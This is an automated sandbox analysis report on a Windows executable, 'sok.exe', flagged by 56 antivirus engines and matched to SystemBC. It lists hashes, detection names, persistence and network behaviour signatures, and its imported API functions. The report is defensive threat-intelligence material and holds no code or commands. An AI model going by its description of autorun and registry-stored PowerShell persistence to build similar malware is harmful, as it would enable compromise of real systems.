ScreenShot
Created | 2024.05.03 07:46 | Machine | s1_win7_x6401 |
Filename | sok.exe | ||
Type | PE32 executable (GUI) Intel 80386, for MS Windows | ||
AI Score |
|
Behavior Score |
|
ZERO API | file : clean | ||
VT API (file) | 56 detected (AIDetectMalware, Coroxy, Malicious, score, ExploitDcomRpc, Fragtor, unsafe, Vnoh, Attribute, HighConfidence, high confidence, Artemis, TrojanX, Garvi, kljjsw, Generic@AI, RDML, t4NxsROVAUg8sWaXwJ7j+A, inrqv, AMADEY, YXEEBZ, high, Outbreak, Detected, ai score=88, cej@4pux8h, Znyonm, Eldorado, ZexaF, aqW@aiwXm5p, BScope, TrojanProxy, Sybici, Genetic, Pzfl, Static AI, Malicious PE, susgen) | ||
md5 | ec7154a50488ecfd5936b6fd10e0a8e3 | ||
sha256 | 05135a36e3f36578a55ec1a8d0e3628a4f8912bf3c65f865cf793b58db27f357 | ||
ssdeep | 96:1y1jUdvqRWXKB1Jww9uKT2MjQcHnjKVOIw+6dT8CKB8tBkLOq:gtKSREKB1aFKjKVV8ToUBk | ||
imphash | a7f2be9d198a373f121c5bf0d47787e0 | ||
impfuzzy | 12:wSgZGGKOHGloj7btzudRURgQKl0ydJWJ9JDJKEKHG/UJXL5JxHDsVpoYdrSgaG:wSA4rojtzudaJOVG8VRjshZSgD |
Network IP location
Signature (5cnts)
Level | Description |
---|---|
danger | Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) |
danger | File has been identified by 56 AntiVirus engines on VirusTotal as malicious |
watch | Communicates with host for which no DNS query was performed |
watch | Installs itself for autorun at Windows startup |
watch | Stores PowerShell commands in the registry likely for persistence |
Rules (5cnts)
Level | Name | Description | Collection |
---|---|---|---|
danger | SystemBC_IN | SystemBC | binaries (upload) |
watch | Antivirus | Contains references to security software | binaries (upload) |
watch | Malicious_Library_Zero | Malicious_Library | binaries (upload) |
info | IsPE32 | (no description) | binaries (upload) |
info | PE_Header_Zero | PE File Signature | binaries (upload) |
PE API
IAT(Import Address Table) Library
user32.dll
0x402050 wsprintfA
kernel32.dll
0x402010 CreateThread
0x402014 ExitProcess
0x402018 GetModuleFileNameA
0x40201c GetVolumeInformationA
0x402020 CreateEventA
0x402024 LocalFree
0x402028 CloseHandle
0x40202c Sleep
0x402030 VirtualAlloc
0x402034 VirtualFree
0x402038 WaitForSingleObject
0x40203c LocalAlloc
0x402040 SetEvent
advapi32.dll
0x402000 RegSetValueExA
0x402004 RegCreateKeyExA
0x402008 RegCloseKey
wsock32.dll
0x402068 WSAStartup
0x40206c closesocket
0x402070 connect
0x402074 htons
0x402078 inet_addr
0x40207c inet_ntoa
0x402080 ioctlsocket
0x402084 recv
0x402088 select
0x40208c send
0x402090 setsockopt
0x402094 shutdown
0x402098 socket
ws2_32.dll
0x402058 freeaddrinfo
0x40205c WSAIoctl
0x402060 getaddrinfo
secur32.dll
0x402048 GetUserNameExA
EAT(Export Address Table) is none
user32.dll
0x402050 wsprintfA
kernel32.dll
0x402010 CreateThread
0x402014 ExitProcess
0x402018 GetModuleFileNameA
0x40201c GetVolumeInformationA
0x402020 CreateEventA
0x402024 LocalFree
0x402028 CloseHandle
0x40202c Sleep
0x402030 VirtualAlloc
0x402034 VirtualFree
0x402038 WaitForSingleObject
0x40203c LocalAlloc
0x402040 SetEvent
advapi32.dll
0x402000 RegSetValueExA
0x402004 RegCreateKeyExA
0x402008 RegCloseKey
wsock32.dll
0x402068 WSAStartup
0x40206c closesocket
0x402070 connect
0x402074 htons
0x402078 inet_addr
0x40207c inet_ntoa
0x402080 ioctlsocket
0x402084 recv
0x402088 select
0x40208c send
0x402090 setsockopt
0x402094 shutdown
0x402098 socket
ws2_32.dll
0x402058 freeaddrinfo
0x40205c WSAIoctl
0x402060 getaddrinfo
secur32.dll
0x402048 GetUserNameExA
EAT(Export Address Table) is none